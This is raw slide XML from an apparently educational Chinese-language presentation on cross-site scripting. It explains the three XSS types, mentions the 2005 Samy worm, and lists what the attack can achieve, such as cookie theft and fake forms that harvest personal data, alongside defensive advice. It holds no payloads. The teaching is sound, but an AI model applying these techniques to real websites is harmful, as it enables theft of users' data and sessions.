            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>的名字</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>直接插入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>里</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>最重要的是，千万不要引入任何不可信的第三方JavaScript到页面里！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2428240" y="5935980"/>
            <a:ext cx="6967855" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss的本质问题就是让对方浏览器执行黑客插入的js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DAC9FFF-8153-0031-AF30-BEC6C27B100B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2667000" y="0"/>
            <a:ext cx="6246055" cy="6335557"/>
            <a:chOff x="2209800" y="201167"/>
            <a:chExt cx="6246055" cy="6335557"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2" name="图片 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E096E00B-EE19-14AF-AD31-B7FFF903F60C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2213633" y="201167"/>
              <a:ext cx="6242222" cy="4819829"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="图片 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ACD028B-2E60-4A06-A8EA-69DE950BF8CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="5165124"/>
              <a:ext cx="6246055" cy="1371600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3401753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113030" y="441325"/>
            <a:ext cx="12003405" cy="5356860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367030" y="1127760"/>
            <a:ext cx="7047865" cy="1568450"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用虚假输入表单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>骗取用户个人信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>窃取用户的Cookie值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，被害者在不知情的情况下，帮助攻击者发送恶意请求。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的文章或图片。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8743950" y="5798185"/>
            <a:ext cx="2700020" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蠕虫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6935470" y="6258560"/>
            <a:ext cx="4914265" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“but most of all, Samy is my hero.”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E8DE054F-AA4F-F85F-2C85-AA6451BB9DB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1673352" y="4395812"/>
            <a:ext cx="7592569" cy="853733"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCC64F59-7ED9-9646-D38E-5354EB805AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9759950" y="1625854"/>
            <a:ext cx="1816100" cy="2679700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3137C678-88C6-2AFD-576A-E154C68421E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1673352" y="170573"/>
            <a:ext cx="7772400" cy="3901262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFC39617-02B9-D1F1-4EAC-38ABFC9FB64F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9759950" y="4238478"/>
            <a:ext cx="1816100" cy="1491796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397559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1844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XSS攻击类型</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2053590" y="1007110"/>
            <a:ext cx="9396730" cy="5262245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击包括三种类型：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反射式XSS（非持久性XSS）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意脚本未经转义被直接输入并作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTML输</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>出的一部分，恶意脚本不在后台存储，直接在前端浏览器被执行。一般容易出现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>页面。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存储式XSS（持久性XSS）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意脚本被后台存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，并后期被其它用户或管理员点击展示从而实现攻击。用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>博客、评论区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等场景，容易</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>造成蠕虫，盗窃cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，危害面更广。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于DOM（Document Object Model）的XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DOM-XSS是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传入参数去控制触发的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>DOM的树形结构会动态的将恶意代码嵌入页面，框架，程序或API而实现的跨站攻击。</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1844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XSS攻击类型</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7EAFCB-4E9D-C982-6F84-001C34F8D35C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927655" y="1013254"/>
            <a:ext cx="9648393" cy="5090624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469900" marR="0" lvl="0" indent="-469900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>XSS</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攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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经过后端，不经过数据库</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="28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数据流向是：浏览器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后端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浏览器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="0" lvl="0" indent="-469900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>XSS</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攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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经过后端，经过数据库</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="28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数据流向是：浏览器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后端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数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="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文件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="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缓存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后端 </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-&gt;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浏览器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="0" lvl="0" indent="-469900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DOM-based</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型</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
